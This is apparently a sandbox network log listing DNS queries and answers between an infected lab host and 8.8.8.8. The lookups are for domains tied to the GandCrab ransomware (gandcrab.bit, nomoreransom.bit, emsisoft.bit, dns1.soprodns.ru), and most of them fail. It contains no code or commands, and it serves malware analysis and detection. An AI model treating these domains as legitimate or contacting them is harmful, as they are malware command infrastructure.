Aug 31, 2022 23:50:18.728477955 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:18.746733904 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:18.768532991 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:19.230156898 CEST	192.168.2.6	8.8.8.8	0x17fb	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:19.817965031 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:19.837605953 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:19.857963085 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:19.877923012 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:19.899743080 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:20.262279034 CEST	192.168.2.6	8.8.8.8	0xdd32	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:21.269645929 CEST	192.168.2.6	8.8.8.8	0xdd32	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:22.271178961 CEST	192.168.2.6	8.8.8.8	0xdd32	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:22.340985060 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:22.360506058 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:22.380544901 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:22.403218031 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:22.423249006 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:22.764307022 CEST	192.168.2.6	8.8.8.8	0x2339	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.309506893 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:23.329807043 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.349894047 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:23.369930983 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.390727997 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:23.749346972 CEST	192.168.2.6	8.8.8.8	0xb987	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.310062885 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:24.330288887 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.350750923 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:24.371077061 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.391366959 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:24.730248928 CEST	192.168.2.6	8.8.8.8	0x3a0	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.812444925 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:24.832633018 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.850862026 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:24.871066093 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.891149998 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:25.258671999 CEST	192.168.2.6	8.8.8.8	0x2446	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:25.914251089 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:25.933530092 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:27.946239948 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:27.967772961 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:28.034455061 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:28.706429958 CEST	192.168.2.6	8.8.8.8	0xc06b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:29.724095106 CEST	192.168.2.6	8.8.8.8	0xc06b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:29.908477068 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:29.933501959 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:30.011262894 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:30.133681059 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:30.152334929 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:32.441836119 CEST	192.168.2.6	8.8.8.8	0xcae5	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.051636934 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:33.071441889 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.089754105 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:33.110094070 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.131000996 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:33.499218941 CEST	192.168.2.6	8.8.8.8	0x7e06	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.616710901 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:33.636816978 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.657267094 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:33.679528952 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:33.702038050 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:34.088475943 CEST	192.168.2.6	8.8.8.8	0x94db	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.141758919 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:34.167188883 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.185396910 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:34.205420017 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.225599051 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:34.730926037 CEST	192.168.2.6	8.8.8.8	0x2898	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.805094957 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:34.824858904 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.845123053 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:34.865340948 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:34.885485888 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:35.258631945 CEST	192.168.2.6	8.8.8.8	0x35c5	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:35.837460995 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:35.857431889 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:35.877444029 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:35.901067972 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:35.921513081 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:36.269373894 CEST	192.168.2.6	8.8.8.8	0x2a1b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:37.255727053 CEST	192.168.2.6	8.8.8.8	0x2a1b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:37.942585945 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:37.962894917 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:37.987566948 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:38.007802010 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.028307915 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:38.376159906 CEST	192.168.2.6	8.8.8.8	0x95d8	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.419980049 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:38.440018892 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.460458040 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:38.481064081 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.501185894 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:38.925039053 CEST	192.168.2.6	8.8.8.8	0xbe58	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:39.927758932 CEST	192.168.2.6	8.8.8.8	0xbe58	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:40.927438021 CEST	192.168.2.6	8.8.8.8	0xbe58	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.064487934 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:41.082365990 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.105315924 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:41.125727892 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.147699118 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:41.342947960 CEST	192.168.2.6	8.8.8.8	0x7e01	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.993149042 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:42.013339043 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:42.033911943 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:42.053870916 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:42.072022915 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:42.260376930 CEST	192.168.2.6	8.8.8.8	0xc002	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:42.387754917 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:42.407532930 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:42.427927971 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:42.448009014 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:42.466213942 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:42.652055025 CEST	192.168.2.6	8.8.8.8	0x796	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:43.646301031 CEST	192.168.2.6	8.8.8.8	0x796	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:44.278618097 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:44.300592899 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:44.319184065 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:44.340126038 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:44.362253904 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:44.560638905 CEST	192.168.2.6	8.8.8.8	0xe7ea	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:45.552563906 CEST	192.168.2.6	8.8.8.8	0xe7ea	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:45.626281023 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:45.644561052 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:45.662904024 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:45.681351900 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:45.706056118 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:45.906866074 CEST	192.168.2.6	8.8.8.8	0x2664	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:46.913412094 CEST	192.168.2.6	8.8.8.8	0x2664	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:46.955739975 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:46.975692987 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:46.996273041 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:47.016427994 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:47.037036896 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 31, 2022 23:48:47.429773092 CEST	8.8.8.8	192.168.2.6	0x79e2	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:47.465388060 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:47.488225937 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:47.508804083 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:47.529036045 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:47.549340963 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:49.264957905 CEST	8.8.8.8	192.168.2.6	0x79e2	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:49.988116026 CEST	8.8.8.8	192.168.2.6	0xa153	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:50.135879040 CEST	8.8.8.8	192.168.2.6	0x79e2	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:50.163110971 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:50.183588028 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:50.266885042 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:50.285155058 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:50.305613995 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:53.708446980 CEST	8.8.8.8	192.168.2.6	0xa153	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:54.940237045 CEST	8.8.8.8	192.168.2.6	0x507e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:55.005909920 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:55.024481058 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:55.044683933 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:55.065548897 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:55.085766077 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:57.871090889 CEST	8.8.8.8	192.168.2.6	0x37a1	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:57.940429926 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:57.961014986 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:57.979434013 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:57.997720003 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:58.020783901 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:59.563860893 CEST	8.8.8.8	192.168.2.6	0x37a1	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:00.778501987 CEST	8.8.8.8	192.168.2.6	0x327f	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:00.846194029 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:00.870034933 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:00.910629988 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:00.930983067 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:00.951646090 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:01.369014978 CEST	8.8.8.8	192.168.2.6	0x327f	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:02.226392031 CEST	8.8.8.8	192.168.2.6	0x799	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:02.283921003 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:02.302268028 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:02.320642948 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:02.338948965 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:02.359249115 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:03.865678072 CEST	8.8.8.8	192.168.2.6	0xebfc	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:03.939187050 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:03.958033085 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:03.978843927 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:03.997428894 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:04.032171965 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:06.064717054 CEST	8.8.8.8	192.168.2.6	0x3312	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:06.117698908 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:06.138461113 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:06.157145977 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:06.177340984 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:06.195765972 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:06.744250059 CEST	8.8.8.8	192.168.2.6	0x3312	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.292459011 CEST	8.8.8.8	192.168.2.6	0x2ef	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.356190920 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
